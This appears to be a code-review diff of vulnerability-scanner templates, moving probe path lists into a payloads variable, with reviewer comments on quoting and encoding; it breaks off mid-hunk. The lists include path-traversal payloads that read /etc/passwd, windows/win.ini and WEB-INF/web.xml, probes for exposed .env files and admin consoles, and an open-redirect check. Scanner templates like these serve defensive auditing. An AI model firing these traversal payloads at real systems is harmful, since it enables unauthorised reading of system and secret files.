- method: GET - method: GET
path: path:
- "{{BaseURL}}/pma/server_import.php" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/phpmyadmin/server_import.php" payloads:
- "{{BaseURL}}/phpMyAdmin 2/server_import.php" paths:
- "{{BaseURL}}/db/server_import.php" - "/pma/server_import.php"
- "{{BaseURL}}/server_import.php" - "/phpmyadmin/server_import.php"
- "{{BaseURL}}/PMA/server_import.php" - "/phpMyAdmin 2/server_import.php"
- "{{BaseURL}}/admin/server_import.php" - "/db/server_import.php"
- "{{BaseURL}}/admin/pma/server_import.php" - "/server_import.php"
- "{{BaseURL}}/phpMyAdmin/server_import.php" - "/PMA/server_import.php"
- "{{BaseURL}}/admin/phpMyAdmin/server_import.php" - "/admin/server_import.php"
- "/admin/pma/server_import.php"
- "/phpMyAdmin/server_import.php"
- "/admin/phpMyAdmin/server_import.php"
stop-at-first-match: true stop-at-first-match: true
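Review bot: The entry `"/phpMyAdmin 2/server_import.php"` contains a raw space, which is not valid in a request target. Whether the space is encoded before sending is not visible here. Provided payload values are not encoded a second time, writing it as `- "/phpMyAdmin%202/server_import.php"` removes the dependency on that behaviour and matches how the other templates in this commit pre-encode their paths.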


@ -18,22 +18,25 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/phpmyadmin/scripts/setup.php" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/phpMyAdmin/scripts/setup.php" payloads:
- "{{BaseURL}}/_phpmyadmin/scripts/setup.php" paths:
- "{{BaseURL}}/forum/phpmyadmin/scripts/setup.php" - "/phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/php/phpmyadmin/scripts/setup.php" - "/phpMyAdmin/scripts/setup.php"
- "{{BaseURL}}/typo3/phpmyadmin/scripts/setup.php" - "/_phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/web/phpmyadmin/scripts/setup.php" - "/forum/phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php" - "/php/phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php" - "/typo3/phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/phpmyadmin/setup/index.php" - "/web/phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/pma/setup/index.php" - "/xampp/phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/admin/pma/setup/index.php" - "/sysadmin/phpMyAdmin/scripts/setup.php"
- "{{BaseURL}}/phpmyadmin/setup/" - "/phpmyadmin/setup/index.php"
- "{{BaseURL}}/setup/index.php" - "/pma/setup/index.php"
- "{{BaseURL}}/admin/" - "/admin/pma/setup/index.php"
- "{{BaseURL}/phpMyAdminOLD/setup/index.php" - "/phpmyadmin/setup/"
- "/setup/index.php"
- "/admin/"
- "/phpMyAdminOLD/setup/index.php"
stop-at-first-match: true stop-at-first-match: true
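Review bot: The commit description should say that the last entry here is a behaviour change, not only a move. The old line read `"{{BaseURL}/phpMyAdminOLD/setup/index.php"` with an unbalanced placeholder, so that probe presumably never produced a valid request, and it becomes a working one as `"/phpMyAdminOLD/setup/index.php"`. Results for this template can therefore differ before and after the commit, which matters when comparing scan output across versions.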


@ -10,131 +10,134 @@ info:
http: http:
- method: POST - method: POST
payloads:
paths:
- "/HyperGraphQL"
- "/___graphql"
- "/altair"
- "/api/cask/graphql-playground"
- "/api/graphql"
- "/api/graphql/v1"
- "/explorer"
- "/express-graphql"
- "/gql"
- "/graph"
- "/graph_cms"
- "/graphiql"
- "/graphiql.css"
- "/graphiql.js"
- "/graphiql.min.css"
- "/graphiql.min.js"
- "/graphiql.php"
- "/graphiql/finland"
- "/graphql"
- "/graphql-console"
- "/graphql-devtools"
- "/graphql-explorer"
- "/graphql-playground"
- "/graphql-playground-html"
- "/graphql.php"
- "/graphql/console"
- "/graphql/graphql-playground"
- "/graphql/schema.json"
- "/graphql/schema.xml"
- "/graphql/schema.yaml"
- "/graphql/v1"
- "/je/graphql"
- "/laravel-graphql-playground"
- "/playground"
- "/portal-graphql"
- "/query"
- "/query-api"
- "/query-explorer"
- "/query-laravel"
- "/sphinx-graphiql"
- "/subscriptions"
- "/v1"
- "/v1/altair"
- "/v1/api/graphql"
- "/v1/explorer"
- "/v1/graph"
- "/v1/graphiql"
- "/v1/graphiql.css"
- "/v1/graphiql.js"
- "/v1/graphiql.min.css"
- "/v1/graphiql.min.js"
- "/v1/graphiql.php"
- "/v1/graphiql/finland"
- "/v1/graphql"
- "/v1/graphql-explorer"
- "/v1/graphql.php"
- "/v1/graphql/console"
- "/v1/graphql/schema.json"
- "/v1/graphql/schema.xml"
- "/v1/graphql/schema.yaml"
- "/v1/playground"
- "/v1/subscriptions"
- "/v2"
- "/v2/altair"
- "/v2/api/graphql"
- "/v2/explorer"
- "/v2/graph"
- "/v2/graphiql"
- "/v2/graphiql.css"
- "/v2/graphiql.js"
- "/v2/graphiql.min.css"
- "/v2/graphiql.min.js"
- "/v2/graphiql.php"
- "/v2/graphiql/finland"
- "/v2/graphql"
- "/v2/graphql-explorer"
- "/v2/graphql.php"
- "/v2/graphql/console"
- "/v2/graphql/schema.json"
- "/v2/graphql/schema.xml"
- "/v2/graphql/schema.yaml"
- "/v2/playground"
- "/v2/subscriptions"
- "/v3"
- "/v3/altair"
- "/v3/api/graphql"
- "/v3/explorer"
- "/v3/graph"
- "/v3/graphiql"
- "/v3/graphiql.css"
- "/v3/graphiql.js"
- "/v3/graphiql.min.css"
- "/v3/graphiql.min.js"
- "/v3/graphiql.php"
- "/v3/graphiql/finland"
- "/v3/graphql"
- "/v3/graphql-explorer"
- "/v3/graphql.php"
- "/v3/graphql/console"
- "/v3/graphql/schema.json"
- "/v3/graphql/schema.xml"
- "/v3/graphql/schema.yaml"
- "/v3/playground"
- "/v3/subscriptions"
- "/v4/altair"
- "/v4/api/graphql"
- "/v4/explorer"
- "/v4/graph"
- "/v4/graphiql"
- "/v4/graphiql.css"
- "/v4/graphiql.js"
- "/v4/graphiql.min.css"
- "/v4/graphiql.min.js"
- "/v4/graphiql.php"
- "/v4/graphiql/finland"
- "/v4/graphql"
- "/v4/graphql-explorer"
- "/v4/graphql.php"
- "/v4/graphql/console"
- "/v4/graphql/schema.json"
- "/v4/graphql/schema.xml"
- "/v4/graphql/schema.yaml"
- "/v4/playground"
- "/v4/subscriptions"
path: path:
- "{{BaseURL}}/HyperGraphQL" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/___graphql"
- "{{BaseURL}}/altair"
- "{{BaseURL}}/api/cask/graphql-playground"
- "{{BaseURL}}/api/graphql"
- "{{BaseURL}}/api/graphql/v1"
- "{{BaseURL}}/explorer"
- "{{BaseURL}}/express-graphql"
- "{{BaseURL}}/gql"
- "{{BaseURL}}/graph"
- "{{BaseURL}}/graph_cms"
- "{{BaseURL}}/graphiql"
- "{{BaseURL}}/graphiql.css"
- "{{BaseURL}}/graphiql.js"
- "{{BaseURL}}/graphiql.min.css"
- "{{BaseURL}}/graphiql.min.js"
- "{{BaseURL}}/graphiql.php"
- "{{BaseURL}}/graphiql/finland"
- "{{BaseURL}}/graphql"
- "{{BaseURL}}/graphql-console"
- "{{BaseURL}}/graphql-devtools"
- "{{BaseURL}}/graphql-explorer"
- "{{BaseURL}}/graphql-playground"
- "{{BaseURL}}/graphql-playground-html"
- "{{BaseURL}}/graphql.php"
- "{{BaseURL}}/graphql/console"
- "{{BaseURL}}/graphql/graphql-playground"
- "{{BaseURL}}/graphql/schema.json"
- "{{BaseURL}}/graphql/schema.xml"
- "{{BaseURL}}/graphql/schema.yaml"
- "{{BaseURL}}/graphql/v1"
- "{{BaseURL}}/je/graphql"
- "{{BaseURL}}/laravel-graphql-playground"
- "{{BaseURL}}/playground"
- "{{BaseURL}}/portal-graphql"
- "{{BaseURL}}/query"
- "{{BaseURL}}/query-api"
- "{{BaseURL}}/query-explorer"
- "{{BaseURL}}/query-laravel"
- "{{BaseURL}}/sphinx-graphiql"
- "{{BaseURL}}/subscriptions"
- "{{BaseURL}}/v1"
- "{{BaseURL}}/v1/altair"
- "{{BaseURL}}/v1/api/graphql"
- "{{BaseURL}}/v1/explorer"
- "{{BaseURL}}/v1/graph"
- "{{BaseURL}}/v1/graphiql"
- "{{BaseURL}}/v1/graphiql.css"
- "{{BaseURL}}/v1/graphiql.js"
- "{{BaseURL}}/v1/graphiql.min.css"
- "{{BaseURL}}/v1/graphiql.min.js"
- "{{BaseURL}}/v1/graphiql.php"
- "{{BaseURL}}/v1/graphiql/finland"
- "{{BaseURL}}/v1/graphql"
- "{{BaseURL}}/v1/graphql-explorer"
- "{{BaseURL}}/v1/graphql.php"
- "{{BaseURL}}/v1/graphql/console"
- "{{BaseURL}}/v1/graphql/schema.json"
- "{{BaseURL}}/v1/graphql/schema.xml"
- "{{BaseURL}}/v1/graphql/schema.yaml"
- "{{BaseURL}}/v1/playground"
- "{{BaseURL}}/v1/subscriptions"
- "{{BaseURL}}/v2"
- "{{BaseURL}}/v2/altair"
- "{{BaseURL}}/v2/api/graphql"
- "{{BaseURL}}/v2/explorer"
- "{{BaseURL}}/v2/graph"
- "{{BaseURL}}/v2/graphiql"
- "{{BaseURL}}/v2/graphiql.css"
- "{{BaseURL}}/v2/graphiql.js"
- "{{BaseURL}}/v2/graphiql.min.css"
- "{{BaseURL}}/v2/graphiql.min.js"
- "{{BaseURL}}/v2/graphiql.php"
- "{{BaseURL}}/v2/graphiql/finland"
- "{{BaseURL}}/v2/graphql"
- "{{BaseURL}}/v2/graphql-explorer"
- "{{BaseURL}}/v2/graphql.php"
- "{{BaseURL}}/v2/graphql/console"
- "{{BaseURL}}/v2/graphql/schema.json"
- "{{BaseURL}}/v2/graphql/schema.xml"
- "{{BaseURL}}/v2/graphql/schema.yaml"
- "{{BaseURL}}/v2/playground"
- "{{BaseURL}}/v2/subscriptions"
- "{{BaseURL}}/v3"
- "{{BaseURL}}/v3/altair"
- "{{BaseURL}}/v3/api/graphql"
- "{{BaseURL}}/v3/explorer"
- "{{BaseURL}}/v3/graph"
- "{{BaseURL}}/v3/graphiql"
- "{{BaseURL}}/v3/graphiql.css"
- "{{BaseURL}}/v3/graphiql.js"
- "{{BaseURL}}/v3/graphiql.min.css"
- "{{BaseURL}}/v3/graphiql.min.js"
- "{{BaseURL}}/v3/graphiql.php"
- "{{BaseURL}}/v3/graphiql/finland"
- "{{BaseURL}}/v3/graphql"
- "{{BaseURL}}/v3/graphql-explorer"
- "{{BaseURL}}/v3/graphql.php"
- "{{BaseURL}}/v3/graphql/console"
- "{{BaseURL}}/v3/graphql/schema.json"
- "{{BaseURL}}/v3/graphql/schema.xml"
- "{{BaseURL}}/v3/graphql/schema.yaml"
- "{{BaseURL}}/v3/playground"
- "{{BaseURL}}/v3/subscriptions"
- "{{BaseURL}}/v4/altair"
- "{{BaseURL}}/v4/api/graphql"
- "{{BaseURL}}/v4/explorer"
- "{{BaseURL}}/v4/graph"
- "{{BaseURL}}/v4/graphiql"
- "{{BaseURL}}/v4/graphiql.css"
- "{{BaseURL}}/v4/graphiql.js"
- "{{BaseURL}}/v4/graphiql.min.css"
- "{{BaseURL}}/v4/graphiql.min.js"
- "{{BaseURL}}/v4/graphiql.php"
- "{{BaseURL}}/v4/graphiql/finland"
- "{{BaseURL}}/v4/graphql"
- "{{BaseURL}}/v4/graphql-explorer"
- "{{BaseURL}}/v4/graphql.php"
- "{{BaseURL}}/v4/graphql/console"
- "{{BaseURL}}/v4/graphql/schema.json"
- "{{BaseURL}}/v4/graphql/schema.xml"
- "{{BaseURL}}/v4/graphql/schema.yaml"
- "{{BaseURL}}/v4/playground"
- "{{BaseURL}}/v4/subscriptions"
headers: headers:
Content-Type: application/json Content-Type: application/json
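Review bot: The list has bare `"/v1"`, `"/v2"` and `"/v3"` entries but no `"/v4"`; the v4 group starts at `"/v4/altair"`. The gap is carried over unchanged from the old `path` list, so it may be deliberate, but if not, add `- "/v4"` ahead of `- "/v4/altair"` to keep the four version groups parallel. Separately, this is the only template in this view where `payloads:` is placed before `path:`; putting `path:` first, as the others do, would make the converted templates read the same way.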


@ -15,23 +15,26 @@ info:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/Telerik.Web.UI.DialogHandler.aspx?dp=1' - "{{BaseURL}}{{paths}}"
- '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1' payloads:
- '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1' paths:
- '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1' - '/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1'
- '{{BaseURL}}/Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1'
- '{{BaseURL}}/Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1'
- '{{BaseURL}}/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1' - '/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/Telerik.Web.UI.DialogHandler.axd?dp=1' - '/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1'
- '/Telerik.Web.UI.DialogHandler.axd?dp=1'
stop-at-first-match: true stop-at-first-match: true
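Review bot: The new `path` line is double-quoted (`"{{BaseURL}}{{paths}}"`) while the payload entries below it keep single quotes, whereas the AEM templates in this commit were switched to double quotes throughout. Pick one quoting style for the block, e.g. `- "/Telerik.Web.UI.DialogHandler.aspx?dp=1"`, so the file stays consistent and passes a quoted-strings lint rule if the repository uses one.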


@ -17,28 +17,31 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/.env" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/.env.bak" payloads:
- "{{BaseURL}}/.env.dev" paths:
- "{{BaseURL}}/.env.dev.local" - "/.env"
- "{{BaseURL}}/.env.development.local" - "/.env.bak"
- "{{BaseURL}}/.env.prod" - "/.env.dev"
- "{{BaseURL}}/.env.prod.local" - "/.env.dev.local"
- "{{BaseURL}}/.env.production" - "/.env.development.local"
- "{{BaseURL}}/.env.production.local" - "/.env.prod"
- "{{BaseURL}}/.env.local" - "/.env.prod.local"
- "{{BaseURL}}/.env.example" - "/.env.production"
- "{{BaseURL}}/.env.stage" - "/.env.production.local"
- "{{BaseURL}}/.env.live" - "/.env.local"
- "{{BaseURL}}/.env.backup" - "/.env.example"
- "{{BaseURL}}/.env.save" - "/.env.stage"
- "{{BaseURL}}/.env.old" - "/.env.live"
- "{{BaseURL}}/.env.www" - "/.env.backup"
- "{{BaseURL}}/.env_1" - "/.env.save"
- "{{BaseURL}}/.env_sample" - "/.env.old"
- "{{BaseURL}}/.env.{{DN}}" - "/.env.www"
- "{{BaseURL}}/.env.{{SD}}" - "/.env_1"
- "{{BaseURL}}/api/.env" - "/.env_sample"
- "/.env.{{DN}}"
- "/.env.{{SD}}"
- "/api/.env"
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -17,19 +17,22 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/../../../../WEB-INF/web.xml" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/../../../WEB-INF/web.xml" payloads:
- "{{BaseURL}}/../../WEB-INF/web.xml" paths:
- "{{BaseURL}}/%c0%ae/%c0%ae/WEB-INF/web.xml" - "/../../../../WEB-INF/web.xml"
- "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml" - "/../../../WEB-INF/web.xml"
- "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml" - "/../../WEB-INF/web.xml"
- "{{BaseURL}}/../../../WEB-INF/web.xml;x=" - "/%c0%ae/%c0%ae/WEB-INF/web.xml"
- "{{BaseURL}}/../../WEB-INF/web.xml;x=" - "/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
- "{{BaseURL}}/../WEB-INF/web.xml;x=" - "/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
- "{{BaseURL}}/WEB-INF/web.xml" - "/../../../WEB-INF/web.xml;x="
- "{{BaseURL}}/.//WEB-INF/web.xml" - "/../../WEB-INF/web.xml;x="
- "{{BaseURL}}/../WEB-INF/web.xml" - "/../WEB-INF/web.xml;x="
- "{{BaseURL}}/%c0%ae/WEB-INF/web.xml" - "/WEB-INF/web.xml"
- "/.//WEB-INF/web.xml"
- "/../WEB-INF/web.xml"
- "/%c0%ae/WEB-INF/web.xml"
stop-at-first-match: true stop-at-first-match: true


@ -17,38 +17,41 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/etc/passwd" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/..%5cetc/passwd" payloads:
- "{{BaseURL}}/..%5c..%5cetc/passwd" paths:
- "{{BaseURL}}/..%5c..%5c..%5cetc/passwd" - "/etc/passwd"
- "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd" - "/..%5cetc/passwd"
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd" - "/..%5c..%5cetc/passwd"
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "/..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "/..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5cetc/passwd" - "/..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5cetc/passwd" - "/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd" - "/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd" - "/static/..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd" - "/static/..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "/static/..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "/static/..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/./../../../../../../../../../../etc/passwd" - "/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd" - "/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd" - "/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd" - "/./../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd" - "/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
- "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" - "/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" - "/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
- "{{BaseURL}}/..///////..////..//////etc/passwd" - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
- "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd" - "/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00" - "/..///////..////..//////etc/passwd"
- "{{BaseURL}}/index.php?page=etc/passwd" - "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
- "{{BaseURL}}/index.php?page=etc/passwd%00" - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
- "{{BaseURL}}/index.php?page=../../etc/passwd" - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00"
- "{{BaseURL}}/index.php?page=....//....//etc/passwd" - "/index.php?page=etc/passwd"
- "{{BaseURL}}/../../../../../../../../../etc/passwd" - "/index.php?page=etc/passwd%00"
- "/index.php?page=../../etc/passwd"
- "/index.php?page=....//....//etc/passwd"
- "/../../../../../../../../../etc/passwd"
stop-at-first-match: true stop-at-first-match: true
matchers: matchers:
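Review bot: The values now listed under `paths:` are encoding-sensitive (`%00`, `.%252e`, `%c0%ae`, `..0x5c`), and nothing in the template records that they must stay exactly as written. From this hunk alone I cannot tell whether substitution into `{{BaseURL}}{{paths}}` passes them through unchanged. If any value were decoded or re-encoded on the way, the template would silently lose coverage instead of failing. I would add a comment above `paths:` such as `# encoding-sensitive values; keep byte-for-byte` and compare the emitted requests before and after the conversion in a regression run. The same applies to the `windows/win.ini` and `WEB-INF/web.xml` sections; the `matchers:` block continues outside the hunk.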


@ -17,28 +17,31 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/./../../../../../../../../../../windows/win.ini" payloads:
- "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini" paths:
- "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini" - "/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini"
- "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini" - "/./../../../../../../../../../../windows/win.ini"
- "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini" - "/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini"
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini" - "/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini"
- "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini" - "/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini"
- "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini" - "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini"
- "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini" - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
- "{{BaseURL}}/..///////..////..//////windows/win.ini" - "/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
- "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini" - "/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini" - "/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00" - "/..///////..////..//////windows/win.ini"
- "{{BaseURL}}/index.php?page=windows/win.ini" - "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini"
- "{{BaseURL}}/index.php?page=windows/win.ini%00" - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
- "{{BaseURL}}/index.php?page=../../windows/win.ini" - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00"
- "{{BaseURL}}/index.php?page=....//....//windows/win.ini" - "/index.php?page=windows/win.ini"
- "{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini" - "/index.php?page=windows/win.ini%00"
- "{{BaseURL}}/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini" - "/index.php?page=../../windows/win.ini"
- "{{BaseURL}}/../../../../../../../../../windows/win.ini" - "/index.php?page=....//....//windows/win.ini"
- "{{BaseURL}}/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini" - "/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini"
- "/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini"
- "/../../../../../../../../../windows/win.ini"
- "/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"
stop-at-first-match: true stop-at-first-match: true
matchers: matchers:


@ -19,20 +19,23 @@ info:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/bitrix/rk.php?goto=https://interact.sh' - "{{BaseURL}}{{paths}}"
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh' payloads:
